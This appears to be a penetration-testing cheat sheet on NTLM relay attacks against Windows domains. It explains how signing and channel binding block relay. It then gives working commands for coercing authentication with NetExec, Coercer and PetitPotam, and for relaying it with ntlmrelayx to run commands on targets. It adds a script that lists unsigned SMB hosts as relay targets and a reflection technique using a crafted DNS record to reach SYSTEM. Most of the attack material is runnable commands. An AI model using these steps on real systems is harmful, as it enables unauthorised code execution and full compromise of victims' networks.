# Relay Attack

## Information

After coercing a victim into authenticating with LM or NTLM to an attacker-controlled server, the attacker can try to relay that authentication to targets of their choosing. The relay only works where the target does not require signing or channel binding, which is why the checks below come first.

<table data-header-hidden><thead><tr><th width="92.90234375"></th><th></th></tr></thead><tbody><tr><td><strong>Coerce</strong></td><td>Techniques that let an attacker redirect traffic or force a target to authenticate to an attacker-controlled host.</td></tr></tbody></table>

<table><thead><tr><th width="108.1484375">Defenses</th><th width="208.609375">Required</th><th width="233.48828125">Enabled (negotiated)</th><th>Disabled</th></tr></thead><tbody><tr><td><strong>Signing</strong></td><td>All sessions must be signed. If the peer does not support signing, the connection is refused; this blocks NTLM relay to SMB/LDAP because the relaying attacker never obtains the session key needed to sign.</td><td>Signing is negotiated if the peer supports it; otherwise the session may proceed unsigned. A relayed session that does not ask for signing is therefore still accepted.</td><td>No signing; relayed sessions are accepted.</td></tr><tr><td><strong>EPA</strong></td><td>Channel binding ties the NTLM authentication to the TLS channel (the server certificate), which blocks relay to TLS services such as HTTPS/LDAPS.</td><td>Used when both sides support it. If either side lacks support, authentication proceeds without channel binding and can still be relayed.</td><td>No channel binding.</td></tr></tbody></table>

The LM and NTLM authentication protocols are "application protocol-independent": the three NTLM messages (NEGOTIATE, CHALLENGE, AUTHENTICATE) are simply carried inside whatever application protocol is in use. One can therefore take LM or NTLM authentication messages received over one protocol, say HTTP, and forward them over another, say SMB. That is called cross-protocol LM/NTLM relay. It also means that which relays and attacks are possible depends on the application protocol the authentication messages are embedded in, and on the signing/channel-binding protections that protocol offers.

<figure><img src="https://797548868-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhqLG4rHdEASJgZEcYdEJ%2Fuploads%2FJCiYR24vIYw5Xm6dKz4g%2Fimage.png?alt=media&#x26;token=e04ee872-f1b0-4b9c-a06d-30b7bae1cd91" alt=""><figcaption></figcaption></figure>

<figure><img src="https://797548868-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FhqLG4rHdEASJgZEcYdEJ%2Fuploads%2F7k6dpmGifXkkLcQi6yqM%2Fimage.png?alt=media&#x26;token=c807a380-f941-4f2d-8744-d8eff9d4c101" alt=""><figcaption></figcaption></figure>

For details, see [HERE](https://beta.hackndo.com/ntlm-relay/).

## Detection

With [NetExec](https://github.com/Pennyw0rth/NetExec) and [Coercer](https://github.com/p0dalirius/Coercer) we can verify which coercion methods a host is vulnerable to:

{% code overflow="wrap" %}

```bash
nxc smb <IP> -u <USER> -p <PASS> -M coerce_plus
```

{% endcode %}

{% code overflow="wrap" %}

```bash
# scan: enumerate RPC interfaces/methods on the target that can be abused to coerce an authentication
coercer scan --target-ip <IP> -u <USER> -p <PASS>
# coerce: trigger a specific method so the target authenticates to <MYIP>
# coercer coerce --target-ip <IP> --listener-ip <MYIP> -u <USER> -p <PASS> --filter-protocol-name "<PROTOCOL, e.g. MS-EFSR>" --filter-method-name "<METHOD, e.g. EfsRpcAddUsersToFile>"
```

{% endcode %}

We can also verify LDAP signing and channel binding (EPA) status on the domain controller. SMB signing is reported directly in the banner of the `nxc smb` command above (`signing:True` / `signing:False`).

{% code overflow="wrap" %}

```bash
nxc ldap <IP> -u <USER> -p <PASS> -M ldap-checker
```

{% endcode %}

## Relay

If the captured NetNTLM hash cannot be cracked, the authentication can instead be relayed to another system. A user authenticating from one machine is often a local administrator on another; if the relayed account is a local administrator on the target (and the target does not require SMB signing), commands can be executed without any UAC prompt, because network logons are not subject to UAC elevation. If UAC remote restrictions are enabled on the target (the default, `LocalAccountTokenFilterPolicy` = 0), local accounts other than the built-in *Administrator* (RID 500) receive a filtered token over the network and cannot be used for this; domain accounts that are members of the local Administrators group are not filtered.

With [impacket-ntlmrelayx](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py)

{% code overflow="wrap" %}

```bash
sudo impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET_RETRANSMISSION> -c "<COMMAND_TO_EXECUTE_ON_TARGET>"
```

{% endcode %}
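The Defenses table and the relay step above come down to one selection rule: a host is a usable SMB relay target only if it does not enforce signing. As an added example (not code from the original page, NetExec or impacket), the shell below turns `nxc smb` banner lines into a target list for ntlmrelayx's `-tf` option, keeping only hosts that report `signing:False`. The banner format is the one nxc prints for `nxc smb <range>`, and the sample output, hostnames and addresses are constructed here.

```bash
#!/bin/sh
# Added example: build an ntlmrelayx target list from nxc smb output.
# Rule from the Defenses table: a peer with signing "Required" refuses the
# unsigned session the relay would open, so only signing:False hosts are kept.

# Constructed sample of `nxc smb 10.0.0.0/24` output (not real scan data).
SAMPLE_NXC_OUTPUT='SMB  10.0.0.10  445  DC01   [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:CORP) (signing:True) (SMBv1:False)
SMB  10.0.0.11  445  SRV01  [*] Windows Server 2016 Build 14393 x64 (name:SRV01) (domain:CORP) (signing:False) (SMBv1:False)
SMB  10.0.0.12  445  WS01   [*] Windows 10 Build 19041 x64 (name:WS01) (domain:CORP) (signing:False) (SMBv1:True)
SMB  10.0.0.13  445  FS01   [*] Windows Server 2022 Build 20348 x64 (name:FS01) (domain:CORP) (signing:True) (SMBv1:False)'

# relay_targets: read nxc banner lines on stdin, print "smb://<ip>" for every
# host whose signing flag is False. Field 2 of the banner is the IP address.
relay_targets() {
  awk '/\(signing:False\)/ { print "smb://" $2 }'
}

# relay_targets_excluding <ip>: same list minus one host, e.g. the machine
# whose authentication you are coercing (relaying back to the origin host is
# the separate Reflection case, not the plain relay shown here).
relay_targets_excluding() {
  exclude="$1"
  relay_targets | grep -v -x -F "smb://$exclude" || true
}

# relay_command <targets_file> <command>: the ntlmrelayx invocation that
# consumes the list (-tf takes one [proto://]host per line) and runs
# <command> on each target where the relayed user is a local administrator.
relay_command() {
  targets_file="$1"
  cmd="$2"
  printf 'impacket-ntlmrelayx --no-http-server -smb2support -tf %s -c "%s"\n' \
    "$targets_file" "$cmd"
}

# Stand-alone demonstration: list the relayable hosts and the command to run.
printf '%s\n' "$SAMPLE_NXC_OUTPUT" | relay_targets_excluding 10.0.0.12
relay_command targets.txt whoami
```

In a real engagement the first pipeline reads from `nxc smb <RANGE> -u <USER> -p <PASS>` and its output is redirected into `targets.txt`; the domain controller (signing required by default) never appears in the list, which is exactly why the Reflection section needs a different trick for DCs.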

## Reflection

The reflection variant relays a host's own outbound NTLM authentication back to that same host, allowing an attacker to impersonate high-privilege accounts there (especially SYSTEM or administrators).

<details>

<summary>Description</summary>

Windows uses a hostname comparison to decide whether an outgoing NTLM authentication targets the local machine. If it concludes that the target is itself, it engages **local NTLM mode**, which skips the challenge-response verification and hands the caller's token directly to the server side of the exchange.

This logic breaks when the target name is a **crafted DNS name** that carries marshalled metadata appended to the hostname. Windows parses the string, strips the marshalled part, and compares only the remaining hostname (e.g. `localhost`), wrongly concluding that the connection is local.

As a result, **SYSTEM processes such as `lsass.exe`** can be coerced into authenticating to an attacker-controlled listener using that name. The attacker then **relays the SYSTEM authentication back to the host over SMB**, gaining **SYSTEM-level access**.

</details>

Verify SMB signing status and coercion vulnerabilities

{% code overflow="wrap" %}

```bash
nxc smb <IP> -u <USER> -p <PASS> -M coerce_plus
nxc smb <IP> -u <USER> -p <PASS> -M ntlm_reflection
```

{% endcode %}

Prepare **ntlmrelayx** (impacket) to intercept NTLM authentication and relay it back to the target

{% code overflow="wrap" %}

```bash
ntlmrelayx.py -t [<PROTO>://]<IP/DOMAIN> -smb2support [-i]
# impacket-ntlmrelayx -t <DC01.DOMAIN.COM> -smb2support
# impacket-ntlmrelayx -t winrms://<IP> -smb2support
# impacket-ntlmrelayx -t all://<IP> -smb2support
```

{% endcode %}

Craft a special DNS entry to trick Windows into believing it’s communicating with itself

{% code overflow="wrap" %}

```bash
python3 dnstool.py -u '<DOMAIN>\<USER>' -p <PASS> <DC01.DOMAIN.COM> -a add -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' -d <MyIP> -dns-ip <IP>
```

{% endcode %}

Now use **NetExec** or [**PetitPotam**](https://github.com/topotam/PetitPotam) to coerce the victim host into initiating an outbound NTLM authentication using our spoofed DNS name:

{% code overflow="wrap" %}

```bash
nxc smb <IP> -u <USER> -p <PASS> -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA [-k]
```

{% endcode %}

{% code overflow="wrap" %}

```bash
python3 PetitPotam.py -u <USER> -p <PASS> -d <DOMAIN> localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <DC01.DOMAIN.COM> [-k]
```

{% endcode %}

Finally, when **ntlmrelayx** was started with `-i`, a successful relay opens an interactive SMB client shell bound to 127.0.0.1 on a local TCP port (11000 for the first session; the exact port is printed in the **ntlmrelayx** output), which we connect to with netcat:

```bash
nc 127.0.0.1 11000
```
